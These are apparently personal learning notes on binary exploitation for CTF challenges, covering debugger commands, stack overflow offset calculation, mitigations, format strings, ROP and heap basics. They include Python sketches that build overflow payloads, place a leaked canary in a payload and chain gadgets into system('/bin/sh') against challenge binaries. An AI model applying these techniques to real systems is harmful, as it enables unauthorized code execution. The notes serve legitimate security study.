Binary Exploitation Notes
Just a bunch of notes for me to remember when learning Binary Exploitation. They're in no particular order; I just write as I go.
Before we get started, here are some super sick GDB/GEF commands you're gonna want to remember:
- `x` means examine. This shit needs 2 arguments to work: the location in memory to examine and how to display that memory. The display formats are:

| Format | Meaning | Command |
| --- | --- | --- |
| `o` | Display in octal | `x/o` |
| `x` | Display in hexadecimal | `x/x` |
| `u` | Display in unsigned, standard base-10 decimal | `x/u` |
| `t` | Display in binary | `x/t` |
| `f` | Display as a float | `x/f` |
| `a` | Display as an address | `x/a` |
| `c` | Display as a char | `x/c` |
| `s` | Display as a string | `x/s` |
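- Example (this examines the memory that EIP points to, i.e. the bytes of the next instruction, and displays them in hexadecimal; to print the value of the EIP register itself, use `p/x $eip`):
```
(gdb) x/x $eip
0x8048384 <main+16>: 0x00fc45c7
```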
- Sometimes, the `0x` address you see in the decompiled code will not be the same as the one in the assembly code
- If you click on a function OR A VARIABLE IN THE VARIABLE DECLARATIONS, you will see the stack layout in the disassembly
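- Stuff like `Stack[-0x43] input` means the offset of the `input` variable is `-0x43`. Ghidra measures these offsets from the stack pointer at function entry, which is where the saved return address sits, so `input` starts 0x43 bytes before the return address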
- Hovering over `0x` addresses shows more information, like the hex & decimal value
- Always make sure the architecture/endianness is correct when writing exploits. Refer to my Assembly Notes
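A quick illustration of why endianness matters, as a sketch using Python's standard `struct` module (pwntools' `p32()`/`p64()` do the same kind of packing). The addresses are just example values:

```python
import struct

addr = 0x08048672  # example 32-bit address

little = struct.pack("<I", addr)  # x86/x64: least significant byte first
big = struct.pack(">I", addr)     # big-endian: most significant byte first

print(little.hex())  # 72860408
print(big.hex())     # 08048672

# 64-bit addresses on x64 need 8 bytes ("<Q"), not 4 ("<I")
print(struct.pack("<Q", 0x7fffffffdac8).hex())  # c8daffffff7f0000
```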
- Sometimes, when calculating how many bytes of data are needed to fill up a buffer (or for padding), the hex offset needs to be converted to decimal (e.g. an offset of `0x14` is 20 bytes, not 14: 14 was the wrong value, 20 was the correct amount of bytes)
- Relabelling variables/functions/etc. is a good idea: click on one and press “L” to relabel it
- `search-pattern` in gef and `search` in pwndbg are very useful, use them.
- Example: the function `gets` has executed and has our input of `15935728` (a random number I typed in). `gets` has finished, so the next thing the vulnerable function does is `ret`, and the saved return address (the value that gets popped into `rip`) is stored at `0x7fffffffdac8`, while the start of our input is at `0x7fffffffdaa0`. I ran `search-pattern 15935728` in order to find out where my input started on the stack.
- Another note: in x64, the saved base pointer is stored at `rbp+0x0` and the saved instruction pointer (return address) is stored at `rbp+0x8`
- `0x7fffffffdac8 - 0x7fffffffdaa0 = 0x28` byte offset (`0x28` = 40 in decimal), so WE HAVE TO WRITE 40 BYTES WORTH OF INPUT, AND THE NEXT 8 BYTES OVERWRITE THE RETURN ADDRESS!!! BASICALLY REDIRECTING THE CODE FLOW TO ANOTHER FUNCTION IF WE WANT!!!
- ^^^^^ REMEMBER!!! ^^^^^ Convert hex offsets to decimal when counting how many bytes of padding you need
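The offset math above turned into a payload, as a minimal sketch with Python's `struct`. It assumes a 64-bit little-endian target, and `target` is a hypothetical address, not one from this binary:

```python
import struct

# Addresses from the gdb session above
input_start = 0x7fffffffdaa0  # where search-pattern found our input
saved_ret = 0x7fffffffdac8    # where the saved return address is stored (rbp+0x8)

offset = saved_ret - input_start
print(hex(offset), offset)  # 0x28 40

target = 0x401136  # hypothetical address of the function we want to jump to

payload = b"A" * offset               # fills the buffer and the saved rbp
payload += struct.pack("<Q", target)  # the next 8 bytes overwrite the return address
print(len(payload))  # 48
```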
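- Sometimes, exploits will crash on execution due to “The Movaps Problem”. This is where a general protection fault is triggered when the `movaps` instruction operates on memory that isn't 16-byte aligned. The x86-64 ABI expects `rsp` to be 16-byte aligned right before a `call`, and some libc code (famously inside `system`) uses `movaps` on the stack, so if our overwrite leaves the stack 8 bytes off, libc crashes. That means we need to find a way to align the stack properly.
- I solved this by changing the exploit code to use `0x04005ba`, which is 4 bytes past `*give_shell+0`, so part of the function's prologue (likely the `push rbp`) is skipped and `rsp` ends up 8 bytes different.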
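The other common fix (not the one I used above) is to put a lone `ret` gadget before the target address: every `ret` pops 8 bytes, so one extra `ret` shifts `rsp` by 8 and fixes the 16-byte alignment. A sketch with hypothetical values: `GIVE_SHELL` is just `0x4005ba - 4` from the note above, skipping 4 bytes assumes the prologue starts with `push rbp; mov rbp, rsp`, and `RET_GADGET` is made up (find a real one with ROPgadget or ropper):

```python
import struct

def p64(value):
    """Pack a 64-bit little-endian value (same idea as pwntools' p64)."""
    return struct.pack("<Q", value)

OFFSET = 40            # padding up to the saved return address (example value)
GIVE_SHELL = 0x4005b6  # give_shell+0 (0x4005ba - 4, from the note above)
RET_GADGET = 0x40101a  # hypothetical address of a lone `ret` instruction

# Misaligned: jumping to give_shell+0 can crash inside movaps
crashy = b"A" * OFFSET + p64(GIVE_SHELL)

# Fix 1 (what I did): skip the prologue's push rbp, so rsp ends up 8 bytes different
skip_prologue = b"A" * OFFSET + p64(GIVE_SHELL + 4)

# Fix 2: an extra `ret` pops one more 8-byte slot before give_shell runs
extra_ret = b"A" * OFFSET + p64(RET_GADGET) + p64(GIVE_SHELL)
```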
- Sometimes libc versions and linkers won't match the program/challenge you are exploiting. You can use `pwninit` and `patchelf` to fix this.
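A rough sketch of what a manual `patchelf` fix looks like, built as a command list in Python. The file names (`./chall`, `./ld-linux-x86-64.so.2`) are assumptions, and it assumes the challenge's `libc.so.6` sits in the current directory; `pwninit` automates roughly this step for you:

```python
def patchelf_cmd(binary, ld="./ld-linux-x86-64.so.2", libdir="."):
    """Build a patchelf command that points `binary` at the challenge's loader and libc."""
    return [
        "patchelf",
        "--set-interpreter", ld,  # use the provided dynamic linker (ld.so)
        "--set-rpath", libdir,    # look for libc.so.6 in this directory first
        binary,                   # patched in place, so keep a backup copy
    ]

cmd = patchelf_cmd("./chall")  # hypothetical binary name
print(" ".join(cmd))
# To actually patch it (needs patchelf installed):
#   import subprocess; subprocess.run(cmd, check=True)
```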
- You should write exploits when trying to do shit. Really, I got stuck on this easy ass CTF because I refused to write a simple exploit for it. Use one as a base for a simple buffer overflow.
- Sometimes when overwriting return addresses in exploits, you will need to jump to the memory address BEFORE the call you want to jump to (e.g. so the instruction that loads the call's argument also runs). For example, I jumped to the memory address that was just before the `system` call.
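- Grabbing output is important when writing exploits, like this snippet:
```python
from pwn import *

p = process("./chall")  # hypothetical binary name

for i in range(9):
    try:
        inp = str(p.recvline()[19:].strip())[2:].strip("'")  # Get the address from the leak
    except EOFError:
        log.info("process closed before the leak was read")
print("leak is:", inp)
```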
- The above will start the process and use `for i in range(9)` to read down to the line that contains the leak (each `recvline()` overwrites `inp`, so after the loop it holds the last line read). Then `p.recvline()[19:]` travels along to the right of that line, because in this case the leaked memory address starts 19 characters in. `.strip()` removes the trailing newline. `str()` on a bytes object gives its repr, like `b'0x...'`, which is why `[2:]` is needed to strip the leading `b'`, and `.strip("'")` removes the closing `'` at the end.
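The same parsing on a made-up output line, without pwntools, to show what each step does, plus a cleaner `.decode()` alternative. The line text is hypothetical; in a real exploit it comes from `p.recvline()`:

```python
line = b"Here is your leak: 0x7ffff7a52390\n"  # made-up line; really from p.recvline()

# Same trick as the snippet above: str() of bytes gives "b'0x...'",
# so [2:] drops the leading b' and .strip("'") drops the closing quote
via_str = str(line[19:].strip())[2:].strip("'")

# Cleaner: decode the bytes to a str directly
via_decode = line[19:].strip().decode()

leak = int(via_decode, 16)  # hex string -> number we can do offset math with
print(via_str, via_decode, hex(leak))
```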
- I believe char arrays move up in the stack, therefore calculating offsets for the stack frame I was looking at would be as follows: `0x31 - 0x1d = 0x14` bytes and `0x1d - 0x9 = 0x14`. Both offsets are `0x14` (20 bytes)
- Also, keep an eye out for char sequences by hovering over `0x` addresses. For example, hovering over `0x73303325` shows a `char[]` value of `s03%`. Because x86 is little-endian (the least significant byte is stored first in memory), we need to reverse this to `%30s`, which ends up giving us `dword ptr [EBP + fmt],"%30s"` instead of `dword ptr [EBP + fmt],0x73303325`
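Checking that conversion in Python with `struct` (a small sketch; `0x73303325` is the value from the example above):

```python
import struct

value = 0x73303325  # dword shown in the disassembly

print(struct.pack(">I", value).decode())  # s03%  (most significant byte first, how the hover showed it)
print(struct.pack("<I", value).decode())  # %30s  (little-endian: the order the bytes sit in memory)
```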
- Payload building can also be done within pwntools (e.g. packing addresses with `p64()`).
- Running said payload can be done in gef/gdb using `r < payload`
- This payload specifically overwrote the return address with the address of the `easy` function, making us win.
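A minimal stdlib-only sketch of building a payload file for `r < payload`, assuming a 64-bit target. `OFFSET` and the `easy` address are hypothetical placeholders, not values from the challenge:

```python
import struct

OFFSET = 40      # hypothetical padding up to the saved return address
EASY = 0x400616  # hypothetical address of the `easy` function

payload = b"A" * OFFSET + struct.pack("<Q", EASY)

# Write raw bytes so gdb/gef can feed them to the program with: r < payload
with open("payload", "wb") as f:
    f.write(payload)
```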
- A few quick notes on mitigations:
- NX aka DEP - The No eXecute or the NX bit (also known as Data Execution Prevention or DEP) marks certain areas of the program as not executable, meaning that stored input or data cannot be executed as code. This is significant because it prevents attackers from being able to jump to custom shellcode that they’ve stored on the stack or in a global variable.
- ASLR - This is the randomization of the place in memory where the program, shared libraries, the stack, and the heap are. This can make it harder for an attacker to exploit a service, as knowledge about where the stack, heap, or libc are can't be re-used between program launches. This is a partially effective way of preventing an attacker from jumping to, for example, libc without a leak.
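- PIE - Position Independent Executable (PIE) is another binary mitigation extremely similar to ASLR. It is basically ASLR but for the binary's own code/memory regions: a PIE binary can be loaded at a random base address each run, so even addresses inside the binary itself need a leak.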
- Relocation Read-Only (RELRO) - Partial RELRO is the default setting in GCC, and nearly all binaries you will see have at least partial RELRO. From an attacker's point of view, partial RELRO makes almost no difference, other than it forces the GOT to come before the BSS in memory, eliminating the risk of a buffer overflow on a global variable overwriting GOT entries. Full RELRO makes the entire GOT read-only, which removes the ability to perform a “GOT overwrite” attack, where the GOT address of a function is overwritten with the location of another function or a ROP gadget an attacker wants to run. Full RELRO is not a default compiler setting, as it can greatly increase program startup time since all symbols must be resolved before the program is started. In large programs with thousands of symbols that need to be linked, this could cause a noticeable delay in startup time.
- Stack Canaries - Stack canaries are a secret value placed on the stack which changes every time the program is started. The general idea is that a random value is placed in the stack frame between the local variables (where we actually have input) and the saved base pointer/return address. If we had a buffer overflow to overwrite the saved return address, this value on the stack would be overwritten too. Then, before the function returns, it checks whether that value is still the one it set. If it isn't, it knows that there is a memory corruption bug happening and terminates the program. Stack canaries seem like a clear-cut way to mitigate any stack smashing, as it is practically impossible to just guess a random 64-bit value. However, leaking the canary's value and bruteforcing the canary are two methods which would allow us to get through the canary check.
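- Seeing a call to `<__stack_chk_fail@plt>` in the disassembly means the function is probably protected by a Stack Canary
- RE: Stack Canaries - For x64 ELFs, the pattern is a 0x8 byte qword, where the first seven bytes are random and the last byte is a null byte. "Last" means the least significant byte (the end of the value as printed); since x64 is little-endian, that null byte is actually the first byte in memory.
- RE: Stack Canaries - For x86 ELFs, the pattern is a 0x4 byte dword, where the first three bytes are random and the last byte is a null byte.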
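A sketch of both canary ideas: a quick check for the x64 pattern above, and where a leaked canary goes in the payload. The canary value, buffer length and target address are made up, and it assumes the canary sits directly below the saved `rbp` (typical for gcc, but check the disassembly):

```python
import struct

def p64(value):
    return struct.pack("<Q", value)

def looks_like_canary(value):
    """x64 heuristic: low (least significant) byte is 0x00 and the other 7 bytes aren't all zero."""
    return value & 0xff == 0 and value >> 8 != 0 and value < 2**64

canary = 0x8f3c2a71d45e9b00  # made-up leaked canary
print(looks_like_canary(canary))  # True
print(p64(canary)[0])             # 0: the null byte is the FIRST byte in memory

BUF_LEN = 0x28     # hypothetical distance from buffer start to the canary
TARGET = 0x401196  # hypothetical function to return to

# buffer padding | canary (unchanged) | saved rbp (junk) | return address
payload = b"A" * BUF_LEN + p64(canary) + b"B" * 8 + p64(TARGET)
```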
- libc is where standard functions like `fgets` and `puts` live.
- While the addresses in a memory space will change between runs, the offsets between addresses within the same region (e.g. two functions inside libc) will not change
- Getting an infoleak for certain parts of the memory, like `libc` for example, means that the infoleak is only good for the `libc` region of memory; we can't use that infoleak for areas like the `stack` or `heap`
- Offset/hex calculation can be done with Python using `hex(addr1 - addr2)`
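Putting the last few notes together: because offsets inside libc don't change, one leaked libc address is enough to find everything else in libc. A sketch with made-up offsets and a made-up leak (real offsets come from the challenge's libc, e.g. via `readelf -s`):

```python
# Hypothetical numbers: real offsets come from the challenge's libc (e.g. readelf -s libc.so.6)
PUTS_OFFSET = 0x80970
SYSTEM_OFFSET = 0x4f550

leaked_puts = 0x7f1234580970  # hypothetical runtime address of puts from an infoleak

libc_base = leaked_puts - PUTS_OFFSET    # the base changes every run (ASLR)...
system_addr = libc_base + SYSTEM_OFFSET  # ...but the offsets inside libc don't

print(hex(libc_base))    # 0x7f1234500000 (a correct base usually ends in 000: page aligned)
print(hex(system_addr))  # 0x7f123454f550
```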
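- The `info frame` (or `i f`) command shows more information about the current stack frame, including the saved `eip` (return address) and where saved registers like `ebp` and `ebx` are stored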
- The `search-pattern` command is also very useful for finding input on the stack
- A Format String attack is an alternate way of exploiting programs that doesn't necessarily require smashing the stack. Instead, it leverages the format characters in a format string to generate excessive data, read from arbitrary memory, or write to arbitrary memory
Example:
```
user@si485H-base:demo$ ./format_error "Hello World"
Hello World
user@si485H-base:demo$ ./format_error "Go Navy"
Go Navy
user@si485H-base:demo$ ./format_error "%x"
b7fff000
```
- `%x` caused the program to output a value from the stack (here `b7fff000`, which looks like an address)
```
user@si485H-base:demo$ ./format_error "%s.%s.%s.%s.%s.%s.%s"
4.??u?.UW1?VS???????unull).(null).?$?U?
user@si485H-base:demo$ ./format_error "%s.%s.%s.%s.%s.%s.%s.%s"
Segmentation fault (core dumped)
```
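- Using `%s` can also cause crashes, as seen above: `%s` treats each value it pulls off the stack as a pointer to a string, so a value that isn't a valid address segfaults the program.
- List of formats:
  - `%d`: signed number
  - `%u`: unsigned number
  - `%x`: hexadecimal number
  - `%f`: floating point number
  - `%s`: string conversion
  - `%n`: printf has a `%n` specifier. Instead of printing anything, it writes an integer equal to the number of bytes printed so far to the memory address given by the corresponding argument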
- Using `%#x` will output `0xdeadbeef` instead of `deadbeef`
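Python's printf-style `%` formatting behaves like C's `printf` for these conversions, so it's a handy way to see what they output. A sketch only: Python has no `%n`, and its `%u` doesn't behave like C's, so those are left out:

```python
value = 0xdeadbeef

print("%x" % value)     # deadbeef
print("%#x" % value)    # 0xdeadbeef  (# adds the 0x prefix)
print("%08x" % 0xbeef)  # 0000beef    (zero-padded to 8 hex digits)
print("%d" % -1)        # -1

# A typical leak probe: in C, each %x makes printf print its next "argument"
# (read off the stack on 32-bit), even though none were passed
probe = ".".join(["%x"] * 4)
print(probe)            # %x.%x.%x.%x
```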
- Format String exploits are confusing asf, learn more about them.
- The GOT (Global Offset Table) is a table of addresses in the binary that holds the runtime addresses of libc functions
- Sometimes, random functions may not actually be random; they may be based on a certain condition. For example, a random number is generated depending on the current TIME, or DATE, or current VARIABLE in memory… This is pretty rare to see, but still worth knowing.
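A common case is `srand(time(NULL))`: if you know the seed, you can reproduce the "random" numbers. A sketch that calls the real C library's `srand()`/`rand()` through Python's `ctypes`, assuming a Linux/glibc system and that the target uses the same libc and seeds within the same second:

```python
import ctypes
import ctypes.util
import time

# Load the C library (libc.so.6 on Linux) so we use the SAME rand() as the target
libc = ctypes.CDLL(ctypes.util.find_library("c"))
libc.srand.argtypes = [ctypes.c_uint]
libc.srand.restype = None
libc.rand.restype = ctypes.c_int

def predict(seed, count):
    """Return the first `count` values rand() gives after srand(seed)."""
    libc.srand(seed)
    return [libc.rand() for _ in range(count)]

# If the target does srand(time(NULL)), seeding with the current second should match it
guess = predict(int(time.time()), 5)
print(guess)
```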
- RAX - Stores function return values
- RBX - Base pointer to the data section
- RCX - Counter for string and loop operations
- RDX - I/O pointer
- RSI - Source Index pointer for string operations
- RDI - Destination Index pointer for string operations
- RSP - Stack (top) Pointer
- RBP - Stack frame Base Pointer
- RIP - Pointer to next instruction to execute (Instruction Pointer)
- LEAST SIGNIFICANT BYTE OVERWRITES EXIST, AND THEY WORK LIKE THIS:
- When we looked at the saved return address, we saw that it was equal to `0x8048668`. The function we are trying to call (`printFlag`) is at `0x8048672`. BOTH ADDRESSES HAVE THE SAME FIRST 5 HEX DIGITS (`0x80486`), SO THE ONLY DIFFERENCE IS THE LEAST SIGNIFICANT BYTE: `0x68` VS `0x72`. Because x86 is little-endian, that least significant byte is stored first in memory, right where our overflow reaches the saved return address. So to call the `printFlag` function at `0x8048672`, we only need to overwrite that one byte with `0x72`.
- ANOTHER EXAMPLE:
- The address that it is initialized to is `0x565556ad`, and the address we want to set it to is `0x565556d8` (for `print_flag`). The difference between these two is just the least significant byte, so we can just overwrite the least significant byte to be `0xd8`, and that will call `print_flag`.
- ROP (Return Oriented Programming) is a technique in exploitation to reuse existing code gadgets in a target binary as a method to bypass DEP
- A Gadget is a sequence of meaningful instructions typically followed by a return instruction
- Usually multiple Gadgets are chained together to complete malicious actions similar to what shellcode would do
- These are called ROP Chains
- Using `shell` in gdb will pop you back to a shell, and searching for the process with `ps -aux | grep <processname>` will get you the process ID, which you can use with `cat /proc/<PROCESSID>/maps` to get info on the linked libraries. `info proc` in gdb or gef will also show the process ID for you
- You can use `ropper` to search for ROP gadgets
- When ROPping, the best thing to do is plan what you want to do and write the plan out in bullet points.
- Keep in mind that our ROP chain consists of addresses of instructions, not the instructions themselves. So we overwrite the return address with the first gadget of the ROP chain, and each time a gadget returns, execution keeps going down the chain until we get our shell
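A sketch of a classic x64 ROP chain laid out as data, following the plan-first approach above. Every address is hypothetical (find real ones with ROPgadget/ropper), and it relies on x64 Linux passing the first function argument in `rdi`:

```python
import struct

def p64(value):
    return struct.pack("<Q", value)

# The plan, as bullet points:
#   - put the address of "/bin/sh" in rdi (first argument on x64 Linux)
#   - fix stack alignment with a lone ret (the movaps problem)
#   - return into system("/bin/sh")
OFFSET = 40             # hypothetical padding up to the saved return address
POP_RDI_RET = 0x401273  # hypothetical gadget: pop rdi; ret
BIN_SH = 0x402008       # hypothetical address of a "/bin/sh" string
RET = 0x40101a          # hypothetical gadget: ret
SYSTEM = 0x401040       # hypothetical address of system@plt

# Addresses and data, not instructions: pop rdi consumes BIN_SH,
# and each ret pops the next address into rip
chain = [POP_RDI_RET, BIN_SH, RET, SYSTEM]
payload = b"A" * OFFSET + b"".join(p64(entry) for entry in chain)
```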
- ROPgadget is also a good tool to use to look for ROP gadgets, probably better than ropper
- Sometimes, searching in HEX values is required for `search-pattern`
- Using Python to get PLT and GOT addresses is also useful (e.g. with pwntools' `ELF("./binary").plt["puts"]` and `ELF("./binary").got["puts"]`).
- Now we're talking about the HEAP!
- The heap is a pool of memory used for dynamic allocations at runtime: `malloc()` grabs memory on the heap and `free()` releases memory on the heap
- The heap is slower and managed manually, whereas the stack is faster and managed by the compiler
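- Bytes on the heap are fucking weird, but `malloc(8)` is still an 8 byte buffer (the allocator rounds chunk sizes up and adds its own metadata, but only the 8 bytes you asked for are yours to use)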
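- The heap grows toward higher memory addresses and the stack grows toward lower memory addresses (in diagrams with low addresses at the top, that's the heap growing DOWN and the stack growing UP)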
- Heap overflows are basically the same as Stack overflows
- Heap canaries/cookies don't exist the way stack canaries do (glibc's malloc relies on integrity checks of its metadata instead)
- Dangling pointers are leftover pointers in code which reference free'd data and are prone to being re-used.
- Since the memory it was pointing at was free'd, there are no guarantees on what data is there now.
- Memory corruption is not required to exploit UAF; it is simply an implementation issue
- UAF only exists in certain states of execution
- Usually only found through crashes
- Heap Spraying is a technique used to increase exploit reliability by filling the heap with large chunks of data relevant to the exploit you are trying to do
- Heap Spraying can help bypass ASLR on 32-bit
- Heap Spraying on 64-bit can't really be used to bypass ASLR, because the address space is far too large to fill
- Metadata Corruption exploits involve corrupting heap metadata in a way that allows you to use the allocator's internal functions to cause a controlled write of some sort
- This generally involves faking chunks and abusing the allocator's coalescing or unlinking processes
- Metadata exploits are hard to pull off due to heaps being fairly hardened on modern OSes
- Quick note: the registers area in gdb can be used to check whether inputs or values in registers are within the heap. For example, `$rsi` was `0x00005555556036b0`
- Then, after running `vmmap`, we can see that the heap starts at `0x0000555555603000` and ends at `0x0000555555624000`
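The same range check as a tiny Python sketch, using the `vmmap` values above:

```python
HEAP_START = 0x0000555555603000  # from vmmap
HEAP_END = 0x0000555555624000    # end of the heap mapping (exclusive)

def in_region(addr, start, end):
    """True if addr is inside [start, end), the way vmmap lists ranges."""
    return start <= addr < end

rsi = 0x00005555556036b0
print(in_region(rsi, HEAP_START, HEAP_END))  # True
```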
- Because `0x00005555556036b0` is between the start and end addresses of the heap, we know that the value in the `$rsi` register is within the heap
- Malloc will reuse previously freed chunks if they are the right size, for performance reasons
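A toy model of that reuse, and of why it enables use after free. This is NOT glibc's real allocator; it only mimics the last-in-first-out reuse of same-sized chunks that glibc's tcache/fastbins show:

```python
class ToyAllocator:
    """Toy model of chunk reuse: NOT glibc's real malloc.

    Freed chunks go on a per-size free list, and malloc of the same size hands back
    the most recently freed one first (last in, first out).
    """

    def __init__(self, base=0x555555603000):
        self.top = base       # next never-used address
        self.free_lists = {}  # size -> list of freed chunk addresses

    def malloc(self, size):
        bucket = self.free_lists.get(size)
        if bucket:
            return bucket.pop()  # reuse a freed chunk of the right size
        addr = self.top
        self.top += size
        return addr

    def free(self, addr, size):
        self.free_lists.setdefault(size, []).append(addr)


heap = ToyAllocator()
a = heap.malloc(0x20)
heap.free(a, 0x20)     # `a` is now a dangling pointer
b = heap.malloc(0x20)  # same size, so the freed chunk is handed straight back
print(a == b)          # True: using `a` now touches `b`'s data (use after free)
c = heap.malloc(0x30)  # different size, so it gets fresh memory
print(c == a)          # False
```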